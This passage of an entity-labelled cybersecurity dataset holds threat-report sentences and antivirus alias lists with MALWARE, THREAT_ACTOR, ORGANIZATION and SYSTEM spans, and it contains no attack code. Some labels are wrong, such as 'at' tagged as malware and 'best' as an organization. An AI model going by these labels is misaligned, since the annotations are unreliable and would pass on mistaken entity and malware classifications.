"cyner2_train_005579", "source": "cyner2_train"}} {"text": "SilentPush investigates a recent Facebook phishing campaign targeting social media users on Facebook Messenger, but what do we know about the attack's tactics and what can we do about it?", "spans": {"ORGANIZATION: SilentPush": [[0, 10]], "THREAT_ACTOR: Facebook phishing campaign": [[33, 59]], "SYSTEM: social media": [[70, 82]], "SYSTEM: Facebook Messenger,": [[92, 111]]}, "info": {"id": "cyner2_train_005580", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.VB!O Trojan.VB Trojan.Symmi.DFDA4 Win32.Trojan.WisdomEyes.16070401.9500.9858 Trojan.Win32.VB.ckrm Trojan.Win32.VB.edplzz Troj.W32.Vb!c Trojan:W32/Kilim.P Trojan.VB.Win32.164816 TR/Kecix.ztie Trojan/Win32.VB Trojan:Win32/Kecix.A Trojan.Win32.VB.ckrm Trojan.VB Trj/CI.A Win32.Trojan.Vb.Pdlo Trojan.VB!Qw/pqsBL6E0 Win32.Outbreak Win32/Trojan.b08", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005582", "source": "cyner2_train"}} {"text": "A backdoor also known as: Tool.PassView.Win32.702 
Win.Trojan.Lmir-87 not-a-virus:PSWTool.Win32.PassView.vly Win32.Trojan.Psw.Szlj Application.Win32.PassView.1_51 BehavesLike.Win32.Dropper.mh not-a-virus:PSWTool.Win32.PassView W32/Application.YMHQ-2387 Backdoor/Prorat.fxr TR/PSW.Dumaru Trojan[PSWTool]/Win32.PassView Worm:Win32/Dumaru.H@mm Application.Heur.E5E9B8 not-a-virus:PSWTool.Win32.PassView.vly PassDump.b PUP.Optional.PassView Riskware.PSWTool!", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005584", "source": "cyner2_train"}} {"text": "While some criminals blow up ATMs to steal cash, others use less destructive methods, such as infecting the ATM with malware and then stealing the money.", "spans": {"THREAT_ACTOR: criminals": [[11, 20]], "SYSTEM: ATMs": [[29, 33]], "SYSTEM: ATM": [[108, 111]], "MALWARE: malware": [[117, 124]]}, "info": {"id": "cyner2_train_005585", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Pinfi.B Win32.Parite.B Virus/W32.Parite.C Virus.Win32.Parite.b!O W32.Perite.A W32/Pate.b W32/Pate.B Win32.Virus.Parite.d W32/Parite.B@mm W32.Pinfi.B Win32/Pinfi.A PE_PARITE.A Heuristics.W32.Parite.B Virus.Win32.Parite.b Win32.Parite.B Virus.Win32.Parite.bgvo W32.Parite.b!c Win32.Parite.B Win32.Parite.B Win32.Parite.2 Virus.Parite.Win32.9 PE_PARITE.A BehavesLike.Win32.Pate.gc Trojan.Win32.FakeAV W32/Parite.LAQX-0866 Win32/Parite.b Virus/Win32.Parite.c Win32.Parite.b.5756 TrojanDownloader:Win32/Grogsas.A Win32.Parite.B Win32.Parite.A Virus.Win32.Parite.b Win32.Parite.B Win32.Parite.B Virus.Win32.Parite.b Win32.Parite.B Win32/Parite.B Win32.Parite.B W32/Parite.B W32/Parite.B Virus.Win32.Parite.H", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005586", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Suslix.C Backdoor/W32.PlxT.20480 Backdoor.Suslix.C Win32.Trojan.WisdomEyes.16070401.9500.9991 W32/Backdoor.NXX Backdoor.Trojan Win32/Paltry.C Win.Trojan.Delf-473 Backdoor.Suslix.C Backdoor.Win32.PlxT.a 
Backdoor.Suslix.C Backdoor.Win32.Z.Suslix.20480 Backdoor.Suslix.C W32/Backdoor.PGXD-0378 Backdoor/PlxT.b Trojan[Backdoor]/Win32.Suslix Backdoor.Suslix.C Backdoor.Win32.PlxT.a Backdoor:Win32/Suslix.A Backdoor.Suslix.C Trj/CI.A Win32/Suslix.NAA Win32.Backdoor.Plxt.Ejez Trojan.Win32.Spy W32/Suslix.NAA!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005588", "source": "cyner2_train"}} {"text": "Cyber4Sight has analyzed the malware distributed via the compromised Polish Financial Supervision Authority webpage and used in targeted attacks against a number of large banks and telecommunication companies.", "spans": {"ORGANIZATION: Cyber4Sight": [[0, 11]], "MALWARE: malware": [[29, 36]], "ORGANIZATION: large banks": [[165, 176]], "ORGANIZATION: telecommunication companies.": [[181, 209]]}, "info": {"id": "cyner2_train_005589", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.Small.38400.AY Trojan-Spy.Win32.Brospa!O Trojan.Witkinat Trojan/Spy.Brospa.cm TROJ_BROSPA.SMC Win32.Trojan.WisdomEyes.16070401.9500.9979 Backdoor.Trojan Win32/Witkinat.AY TROJ_BROSPA.SMC Win.Spyware.78717-2 Trojan.Win32.Brospa.bpglj Trojan.Win32.A.Brospa.38400.N Trojan.PWS.iThink.16 Trojan.Brospa.Win32.159 Trojan.Win32.Scar TrojanSpy.Brospa.o W32.Trojan.Witkinat.A Trojan[Spy]/Win32.Brospa Trojan:Win32/Witkinat.A Trojan/Win32.Brospa.R4351 TrojanSpy.Brospa Win32.Trojan-spy.Brospa.Wrqa W32/Witkinat.Q!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005590", "source": "cyner2_train"}} {"text": "It appears to have evolved from the NewPOSthings family of malware first discovered by Dennis Schwarz and Dave Loftus at Arbor Networks.", "spans": {"MALWARE: NewPOSthings family of malware": [[36, 66]], "ORGANIZATION: Arbor Networks.": [[121, 136]]}, "info": {"id": "cyner2_train_005594", "source": "cyner2_train"}} {"text": "This new variant, dubbed HummingWhale,' includes new, cutting edge techniques that allow it to perform ad fraud 
better than ever before.", "spans": {"MALWARE: HummingWhale,'": [[25, 39]]}, "info": {"id": "cyner2_train_005596", "source": "cyner2_train"}} {"text": "SANS mail server quarantined this file FautraPago392023.gz and extracted the file to find there was no .exe extension associated with the file.", "spans": {"SYSTEM: SANS mail server": [[0, 16]]}, "info": {"id": "cyner2_train_005598", "source": "cyner2_train"}} {"text": "When installed, GreenDispenser may display an out of service' message on the ATM -- but attackers who enter the correct pin codes can then drain the ATM's cash vault and erase GreenDispenser using a deep delete process, leaving little if any trace of how the ATM was robbed.", "spans": {"MALWARE: GreenDispenser": [[16, 30]], "ORGANIZATION: ATM": [[77, 80]], "THREAT_ACTOR: attackers": [[88, 97]], "SYSTEM: ATM's cash vault": [[149, 165]], "SYSTEM: ATM": [[259, 262]]}, "info": {"id": "cyner2_train_005599", "source": "cyner2_train"}} {"text": "Interestingly , there is an allowlist of tapped activities : ui.ConversationActivity ui.ConversationListActivity SemcInCallScreen Quadrapop SocialPhonebookActivity The listener can operate with only coordinates , so it calculates pressed characters by matching given values with hardcoded ones : Additionally , if there is a predefined command , the keylogger can make a screenshot of the tapped display area : Manual access and operator menu There is a hidden menu ( Activity ) for controlling implant features that looks like it was created for manual operator control .", "spans": {}, "info": {"id": "cyner2_train_005600", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.DeltreeY Trojan:BAT/DeltreeY.CA Trojan.BAT.DeltreeY", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005601", "source": "cyner2_train"}} {"text": "A backdoor also known as: Application.Miner.CB Application.Miner.CB Linux/RubyMiner.A BAT_COINMINE.WIPX Application.Miner.CB Troj.Downloader.Shell!c 
Application.Miner.CB Linux.DownLoader.684 BAT_COINMINE.WIPX Trojan.RubyMiner Win32/Trojan.Downloader.72e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005602", "source": "cyner2_train"}} {"text": "The malware is a reflection of how PoS threats, though no longer novel, are increasingly used against businesses and their customers.", "spans": {"MALWARE: malware": [[4, 11]], "MALWARE: PoS threats,": [[35, 47]], "ORGANIZATION: businesses": [[102, 112]], "ORGANIZATION: customers.": [[123, 133]]}, "info": {"id": "cyner2_train_005603", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Skeeyah.19132 Win32.Trojan.WisdomEyes.16070401.9500.9934 not-a-virus:HEUR:Monitor.Win32.BeyondKeyLogger.heur System.Monitor.Relytec.All-in-o TR/Spy.arobe not-a-virus:HEUR:Monitor.Win32.BeyondKeyLogger.heur Trojan:Win32/Dhodareet.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005604", "source": "cyner2_train"}} {"text": "Actors related to the Operation Lotus Blossom campaign continue their attack campaigns in the Asia Pacific region.", "spans": {"THREAT_ACTOR: Actors": [[0, 6]], "THREAT_ACTOR: the Operation": [[18, 31]], "THREAT_ACTOR: Lotus Blossom campaign": [[32, 54]], "THREAT_ACTOR: attack campaigns": [[70, 86]]}, "info": {"id": "cyner2_train_005605", "source": "cyner2_train"}} {"text": "Based on the data we have acquired since October 2016, about 500 organizations from 50 countries were affected by the attack.", "spans": {"ORGANIZATION: organizations": [[65, 78]]}, "info": {"id": "cyner2_train_005607", "source": "cyner2_train"}} {"text": "The AES key is generated using a SHA256 hash and due to the keys being stored on the infected machine, victims in many cases could likely decrypt files without paying the ransom.", "spans": {"SYSTEM: infected machine,": [[85, 102]]}, "info": {"id": "cyner2_train_005608", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Clod2e7.Trojan.3dab 
Backdoor/W32.Bifrose.737280.H Backdoor/Bifrose.chym BKDR_BIFROSE.DMQ W32/Trojan2.NEIM Backdoor.Trojan Win32/Tnega.UYbaRd BKDR_BIFROSE.DMQ Trojan.Win32.Bifrose.crakl Backdoor.W32.Bifrose.chym!c BackDoor.Bifrost.16023 Backdoor.Bifrose.Win32.49130 Backdoor.Bifrose W32/Trojan.TWKO-3939 BDS/Bifrose.chym W32/Bifrose.CHYM!tr.bdr Trojan[Backdoor]/Win32.Bifrose Backdoor/Win32.Bifrose.R127707 Backdoor.Bifrose Backdoor.Bifrose!bEtmoN1K0yI", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005609", "source": "cyner2_train"}} {"text": "The affected educational organizations, for instance, are used to deliver employment exams for government employees.", "spans": {"ORGANIZATION: educational organizations,": [[13, 39]], "ORGANIZATION: government employees.": [[95, 116]]}, "info": {"id": "cyner2_train_005610", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.DusbyetorLTS.Trojan Trojan/W32.Kriskynote.442892.B Backdoor.Kriskynote.A4 Trojan/Rootkitdrv.w Trojan.Graftor.D35150 Win32.Trojan.WisdomEyes.16070401.9500.9510 W32/Trojan.HHCY-2846 Backdoor.Korplug.B Win32/Rootkitdrv.W BKDR_WINNT.SMD Trojan.Win32.Kriskynote.ay Trojan.Win32.Kriskynote.dkkllk Trojan.Win32.Z.Kriskynote.442892 BackDoor.Korplug.18 Trojan.Kriskynote.Win32.1 BKDR_WINNT.SMD Trojan.Win32.Kriskynote Trojan/Kriskynote.a Trojan/Win32.Kriskynote Trojan.Win32.Kriskynote.ay Trojan:Win64/Kriskynote.A!dha Win32/Tnega.aacQTM Trojan.Kriskynote Win32.Trojan.Kriskynote.Lkmz W32/Kriskynote.AY!tr Win32/Trojan.6da", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005611", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Crypt.qk Win32.Trojan.WisdomEyes.16070401.9500.9532 TROJ_KRYPTIK.VTG Trojan.MSIL.Crypt.qk Trojan.Win32.Crypt.djsue BackDoor.Cybergate.1727 Trojan.Crypt.Win32.2613 TROJ_KRYPTIK.VTG Trojan.MSIL.Crypt Trojan/MSIL.bms TR/MSIL.Crypt.qk Trojan.MSIL.Krypt.2 Trojan.MSIL.Crypt.qk TrojanDownloader:Win32/Radet.A Msil.Trojan.Crypt.Swvd 
Trojan.Crypt!QtVXUF+C8/k Win32/Trojan.b12", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005613", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Vetor.PE W32.Virut.G Win32/Virut.17408 PE_VIRUX.J Win.Trojan.Clicker-3135 Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg Virus.Win32.Virut.Ce Win32.Virut.56 PE_VIRUX.J BehavesLike.Win32.Virut.mm Win32/Virut.bn Virus/Win32.Virut.ce Win32.Virut.ce.53248 TrojanClicker:Win32/Sadbick.A W32.Virut.l4o5 Virus.Win32.Virut.ce Win32/Virut.F Virus.Virut.06 Win32/Virut.NBP Worm.Win32.VBNA W32/Sality.AO", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005614", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.9ED0 Win32.Trojan.WisdomEyes.16070401.9500.9999 Win32.HLLM.Reset.493 BehavesLike.Win32.Ransomware.cc Backdoor.Poison Trojan.Midie.DA81B Backdoor/Win32.Poison.R217323 Trojan.Nymaim", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005615", "source": "cyner2_train"}} {"text": "Mandiant, working in partnership with SonicWall Product Security and Incident Response Team PSIRT, has identified a suspected Chinese campaign that involves maintaining long term persistence by running malware on an unpatched SonicWall Secure Mobile Access SMA appliance.", "spans": {"ORGANIZATION: Mandiant,": [[0, 9]], "ORGANIZATION: SonicWall Product Security": [[38, 64]], "ORGANIZATION: Incident Response Team PSIRT,": [[69, 98]], "THREAT_ACTOR: a suspected Chinese campaign": [[114, 142]], "MALWARE: malware": [[202, 209]], "ORGANIZATION: SonicWall": [[226, 235]], "SYSTEM: Secure Mobile Access SMA": [[236, 260]]}, "info": {"id": "cyner2_train_005616", "source": "cyner2_train"}} {"text": "A backdoor also known as: Antivirus2008.DN MemScan:Trojan.Peed.JRX Trojan.Win32.Pakes.czg", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005617", "source": "cyner2_train"}} {"text": "This ransomware encrypts files and uses .braincrypt 
as file name extension for encrypted files.", "spans": {"MALWARE: ransomware": [[5, 15]]}, "info": {"id": "cyner2_train_005618", "source": "cyner2_train"}} {"text": "The first example, a campaign observed on May 17, 2016, uses a fake Microsoft security alert social engineering lure to trick the victim into opening a link that leads to an executable download.", "spans": {"THREAT_ACTOR: campaign": [[21, 29]], "MALWARE: executable download.": [[174, 194]]}, "info": {"id": "cyner2_train_005619", "source": "cyner2_train"}} {"text": "This blog details CNACOM, a web-based campaign that appears to be related to a well-known nation-state actor more commonly associated with spear-phishing attacks.", "spans": {"THREAT_ACTOR: CNACOM,": [[18, 25]], "THREAT_ACTOR: web-based campaign": [[28, 46]], "THREAT_ACTOR: nation-state actor": [[90, 108]]}, "info": {"id": "cyner2_train_005620", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dyloader Win32.Trojan.WisdomEyes.16070401.9500.9997 Trojan.Win32.Injector TR/Dropper.gjdjj Trojan.Graftor.D4C89C W32/Injector.DHHK!tr Trj/GdSda.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005621", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Demp.cxoswz TrojanDropper.Demp.aao Trojan[Dropper]/Win32.Injector", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005622", "source": "cyner2_train"}} {"text": "The effects were broad reaching, with Ukraine Cyber police confirming over 2000 affected companies in Ukraine alone.", "spans": {"ORGANIZATION: Ukraine Cyber police": [[38, 58]], "ORGANIZATION: companies": [[89, 98]]}, "info": {"id": "cyner2_train_005623", "source": "cyner2_train"}} {"text": "A backdoor also known as: RDN/Gaobot.worm!f Backdoor.Agobot.Win32.5073 Backdoor.W32.Agobot.svu!c Trojan.Heur.RP.EDFC38 Win32.Trojan.WisdomEyes.16070401.9500.9986 TROJ_ADAMOL.A Trojan.Win32.Agobot.dikwjo Win32.Backdoor.Agobot.Wlfl TROJ_ADAMOL.A 
BehavesLike.Win32.Downloader.gh Trojan.ATRAPS Backdoor/Agobot.bnd W32/AgoBot.SVU!tr.bdr Trojan[Backdoor]/Win32.Agobot Trojan:Win32/Adamol.A Trojan/Win32.Hupigon.C48593 Trj/Chgt.L", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005624", "source": "cyner2_train"}} {"text": "On the heels of recent disclosures of ATM malware such as Suceful Plotus and Padpin aka Tyupkin, Proofpoint research has discovered yet another variant of ATM malware, which we have dubbed GreenDispenser.", "spans": {"MALWARE: ATM malware": [[38, 49]], "MALWARE: Suceful": [[58, 65]], "MALWARE: Plotus": [[66, 72]], "MALWARE: Padpin": [[77, 83]], "MALWARE: Tyupkin,": [[88, 96]], "ORGANIZATION: Proofpoint research": [[97, 116]], "MALWARE: variant of ATM malware,": [[144, 167]], "MALWARE: GreenDispenser.": [[189, 204]]}, "info": {"id": "cyner2_train_005625", "source": "cyner2_train"}} {"text": "Initial reports of the attacks, published April 26 in Hebrew by the Israel National Cyber Event Readiness Team CERT-IL and The Marker, confirm that the attack was delivered through compromised email accounts at Ben-Gurion University and sent to multiple targets across Israel.", "spans": {"MALWARE: attacks,": [[23, 31]], "ORGANIZATION: the Israel National Cyber Event Readiness Team CERT-IL": [[64, 118]], "ORGANIZATION: The Marker,": [[123, 134]], "ORGANIZATION: Ben-Gurion University": [[211, 232]]}, "info": {"id": "cyner2_train_005627", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Small Trojan.Win32.Small Trojan.Win32.Small.cva Trojan.Win32.Crypted.dxzuxb Troj.W32.Small!c Trojan.PWS.Banker1.19315 Trojan/Win32.Small Trojan.Win32.Small.cva Trojan.Win32.Small Trojan.Small Trj/CI.A Trojan.Win32.Clipbanker W32/ClipBanker.F!tr Win32/Trojan.65e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005628", "source": "cyner2_train"}} {"text": "This is the summary of an analysis by an IT security researcher, which we publish in full.", "spans": 
{"ORGANIZATION: IT security researcher,": [[41, 64]]}, "info": {"id": "cyner2_train_005629", "source": "cyner2_train"}} {"text": "Carbanak also known as Anunak are a group of financially motivated criminals first exposed in 2015.", "spans": {"THREAT_ACTOR: Carbanak": [[0, 8]], "THREAT_ACTOR: Anunak": [[23, 29]], "THREAT_ACTOR: group": [[36, 41]], "THREAT_ACTOR: criminals": [[67, 76]]}, "info": {"id": "cyner2_train_005631", "source": "cyner2_train"}} {"text": "It spread via a recompiled version of the otherwise legitimate open source BitTorrent client application Transmission and distributed on their official website.", "spans": {"SYSTEM: open source BitTorrent client application": [[63, 104]]}, "info": {"id": "cyner2_train_005635", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan-PWS/W32.QQPass.757760.Q Trojan.Win32.Badur!O Risktool.Flystudio.16885 Trojan/AddUser.q TROJ_ADDUSER_EJ19018D.UVPM Win32/Tnega.CEGPWM TROJ_ADDUSER_EJ19018D.UVPM Trojan-Ransom.Win32.Snocry.yj Trojan.Win32.QQPass.cqivxp Backdoor.W32.Hupigon.lHRl Worm.Win32.Dropper.RA Trojan:W32/DelfInject.R Trojan.DownLoader10.35182 Trojan.QQPass.Win32.21864 Exploit.Win32.MS Trojan/PSW.QQPass.qla TR/Strictor.38430 Trojan[PSW]/Win32.QQPass Trojan.Zusy.D2B925 Trojan-Ransom.Win32.Snocry.yj Trojan:Win32/Casus.A Trojan/Win32.QQPass.C217887 Trojan.Badur Win32/AddUser.Q Trojan.Win32.QQPass.i Trojan.PWS.QQPass!VhZvRiUJbao W32/QQPass.ELG!tr.pws Trojan.Win32.Extortioner.Q", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005636", "source": "cyner2_train"}} {"text": "A backdoor also known as: TrojanDownloader.Unruy.C3 Downloader-BPA.d Trojan.Cosmu.Win32.1584 Trojan/Cosmu.fzo Win32.Trojan-Clicker.Cycler.a W32.Unruy.A Win32/Unruy.NaMNFGC HT_UNRUY_GF0601E8.UVPM Win.Trojan.Unruy-5876 Trojan.Win32.Drop.bcagho Troj.Spy.W32.BZub.l2bS TrojWare.Win32.TrojanSpy.BZub.~IP Trojan.MulDrop1.276 HT_UNRUY_GF0601E8.UVPM BehavesLike.Win32.Downloader.rt Trojan-Downloader.Win32.Unruy 
Trojan/Cosmu.bhh TR/Dldr.Unruy.C Worm/Win32.Unknown TrojanDownloader:Win32/Unruy.C Trojan.Unruy.1 Trojan/Win32.Cosmu.R39186 TrojanClicker.Cycler Trojan.CL.Cycler!gZ0c9KQr9Uk W32/ZAccess.Y!tr W32/OverDoom.B.worm Win32/Trojan.688", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005637", "source": "cyner2_train"}} {"text": "Also seen in other Exploits Kits: - Neutrino - Nuclear - Magnitude - RIG - Hanjuan", "spans": {"MALWARE: Exploits Kits:": [[19, 33]], "MALWARE: Neutrino": [[36, 44]], "MALWARE: Nuclear": [[47, 54]], "MALWARE: Magnitude": [[57, 66]], "MALWARE: RIG": [[69, 72]], "MALWARE: Hanjuan": [[75, 82]]}, "info": {"id": "cyner2_train_005639", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.PSW.Qwak.A Trojan-PWS/W32.Qwak.24576 PSWTool.Win32.Pqwak!O Trojan.Pqwak Trojan.Qwak.Win32.2 Trojan.PSW.Qwak.A W32/HackTool.AZN TROJ_PQWAK.A Trojan.PSW.Qwak.A not-a-virus:PSWTool.Win32.Pqwak.10 Trojan.PSW.Qwak.A Riskware.Win32.Pqwak.hqlb Trojan.Win32.Z.Qwak.24576 Trojan.PSW.Qwak.A TrojWare.Win32.PSW.Qwak.A Trojan.PWS.Qwak.10 TROJ_PQWAK.A Trojan.Win32.PSW W32/Tool.QTCZ-8948 TR/Pqwak.A Trojan[PSWTool]/Win32.Pqwak not-a-virus:PSWTool.Win32.Pqwak.10 Win-Trojan/Qwak.24576 Trojan.PSW.Qwak.A TrojanPSW.Qwak Trj/CI.A Win32/PSW.Qwak.A Win32.Trojan.Pqwak.Eeha Trojan.PSW.Qwak!llR4IBPnUH0 Win32/Trojan.006", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005640", "source": "cyner2_train"}} {"text": "Stretching back to April 2016, she d befriended a lot of individuals, as many as 500, with similar interests.", "spans": {"ORGANIZATION: individuals,": [[57, 69]]}, "info": {"id": "cyner2_train_005644", "source": "cyner2_train"}} {"text": "Based on received commands, it can either download malicious apps or switch the C C Twitter account to another one.", "spans": {"MALWARE: malicious apps": [[51, 65]]}, "info": {"id": "cyner2_train_005645", "source": "cyner2_train"}} {"text": "A backdoor also known as: 
TrojanDropper.Goominer Win32.Trojan.WisdomEyes.16070401.9500.9958 Trojan.Win32.Kazy.dbtlfz Trojan.Win32.Z.Kazy.939008.A Trojan.Kazy.D607AA TrojanDropper:Win32/Goominer.A Trj/GdSda.A Win32.Trojan.Kazy.Pciu Trojan.Win32.Comitsproc Win32/Trojan.013", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005647", "source": "cyner2_train"}} {"text": "We dubbed this activity Operation Wilted Tulip", "spans": {"THREAT_ACTOR: Operation Wilted Tulip": [[24, 46]]}, "info": {"id": "cyner2_train_005648", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Win32.Swisyn!O Trojan.Starpage.A.mue Trojan/Swisyn.bhyk Win32.Trojan.Delf.it Trojan.Win32.Fsysna.djck Trojan.Win32.A.Swisyn.97827[UPX] Worm.Win32.Pronny.BL Trojan.PWS.Qqpass.6162 Trojan.Swisyn.Win32.21499 Trojan.Crypt Trojan/Win32.Swisyn HEUR/Fakon.mwf Worm.AutoRun Trojan.Win32.FakeFolder.pb Trojan.Swisyn!4rRLtK78L7s", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005649", "source": "cyner2_train"}} {"text": "Some samples talk to compromised South Korean server at 203.250.148.63 and communicate in port 30000.", "spans": {"VULNERABILITY: compromised": [[21, 32]], "SYSTEM: server": [[46, 52]], "MALWARE: at": [[53, 55]]}, "info": {"id": "cyner2_train_005650", "source": "cyner2_train"}} {"text": "The new GozNym hybrid takes the best of both the Nymaim and Gozi ISFB malware to create a powerful Trojan.", "spans": {"MALWARE: GozNym hybrid": [[8, 21]], "ORGANIZATION: best": [[32, 36]], "MALWARE: Nymaim": [[49, 55]], "MALWARE: Gozi ISFB malware": [[60, 77]], "MALWARE: powerful Trojan.": [[90, 106]]}, "info": {"id": "cyner2_train_005652", "source": "cyner2_train"}} {"text": "The people behind the attacks are likely attempting to gain access to computers where banking transactions are performed, in order to steal banking credentials.", "spans": {"SYSTEM: computers": [[70, 79]]}, "info": {"id": "cyner2_train_005653", "source": "cyner2_train"}} {"text": "A backdoor also known 
as: Win32.Trojan.WisdomEyes.16070401.9500.9982 Trojan.Win64 Trojan[Backdoor]/Win32.Simda Trojan:Win64/Claretore.B W64/Simda.BD!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005654", "source": "cyner2_train"}} {"text": "One of them was of particular interest because we'd never seen the backdoor before and it leveraged a relatively unique German dynamic DNS provider for command and control.", "spans": {"MALWARE: backdoor": [[67, 75]]}, "info": {"id": "cyner2_train_005655", "source": "cyner2_train"}} {"text": "A backdoor also known as: Application.Htool.WKE Application.Htool.WKE W32/Risk.IUUB-2604 HKTL_DUMPSEC.TOMA Application.Htool.WKE Application.Htool.WKE Trojan.MulDrop3.34925 HKTL_DUMPSEC.TOMA W32/MalwareS.ITI Packed.Multi.rq HackTool:Win32/Dumpsec.A Application.Htool.WKE", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005657", "source": "cyner2_train"}} {"text": "Marcher inspects its infected devices carefully by using a dedicated, hard-coded configuration in each Android Package Kit APK, Google's file format for distributing and installing application software like mobile banking apps on the Android OS.", "spans": {"MALWARE: Marcher": [[0, 7]], "SYSTEM: Android Package Kit APK, Google's file format": [[103, 148]], "SYSTEM: application software": [[181, 201]], "SYSTEM: mobile banking apps": [[207, 226]], "SYSTEM: the Android OS.": [[230, 245]]}, "info": {"id": "cyner2_train_005658", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Downldr2.IYLF Trojan.Starter.1949 Riskware/Win32.Krap.ii Win32.Hack.Undef.kcloud TrojanDropper:Win32/Kidtok.A W32/Downloader.LQFG-1421 Virus.Win32.Heur.g BScope.Trojan-Spy.Zbot PE:Malware.FakeDOC@CV!1.9C3B Trojan-Dropper.Win32.Kidtok", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005659", "source": "cyner2_train"}} {"text": "Therefore we instead discuss a number of ways to detect and analyse these documents using freely available 
tools.", "spans": {}, "info": {"id": "cyner2_train_005660", "source": "cyner2_train"}} {"text": "PDFs with download links", "spans": {}, "info": {"id": "cyner2_train_005661", "source": "cyner2_train"}} {"text": "A backdoor also known as: PSWTool.Win32.NetPass!O HackTool.Dialupas Tool.NetPass.Win32.1002 Win32.Trojan.WisdomEyes.16070401.9500.9825 W32/Risk.DWIG-1726 Trojan-Spy.IEPV not-a-virus:PSWTool.Win32.NetPass.atx Trojan.Win32.Ool.cjzhzi Tool.PassView.277 BehavesLike.Win32.Downloader.gc W32/MalwareS.AKEN APPL/PSWTool.Pass.A Application.Heur.BmNfbCuqfGoO not-a-virus:PSWTool.Win32.NetPass.atx Trojan/Win32.Klone.C127582 PUP.Optional.Dialupass Trojan.PSWTool!vbtNAUr+Slw", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005662", "source": "cyner2_train"}} {"text": "The email, first of them submitted from Middle East, purports to be coming from a Turkish trading company, which might further indicate the geographic area where the attacks were active.", "spans": {"ORGANIZATION: a Turkish trading company,": [[80, 106]]}, "info": {"id": "cyner2_train_005663", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Cleanmg.Trojan Trojan-Spy.Win32.TianYan!O BackDoor-YA.dr Trojan/Spy.TianYan.b TSPY_TIANYAN.SMD Win32.Backdoor.Prisos.b W32.Killaut.A Win32/TianYan.A TSPY_TIANYAN.SMD Win.Spyware.35814-2 Trojan.Win32.TianYan.xbqa Trojan.Win32.TianYan.40960 Troj.Spy.W32.TianYan.m9ks TrojWare.Win32.TrojanSpy.TianYan.~A Win32.HLLP.Nemesis.28687 BackDoor-YA.dr TrojanSpy.TianYan.a Trojan[Spy]/Win32.TianYan Win32.Troj.TianYan.b.kcloud Trojan.Symmi.D7121 Backdoor:Win32/Prisos.A Worm/Win32.Mabezat.R26794 TrojanSpy.TianYan Win32/Prisos.A Trojan-Spy.Win32.TianYan.b Win32/Trojan.Dropper.e23", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_005664", "source": "cyner2_train"}} {"text": "Our documentation points to a campaign that started somewhere in late February 2015 and ended in mid-March.", "spans": {"THREAT_ACTOR: campaign": [[30, 
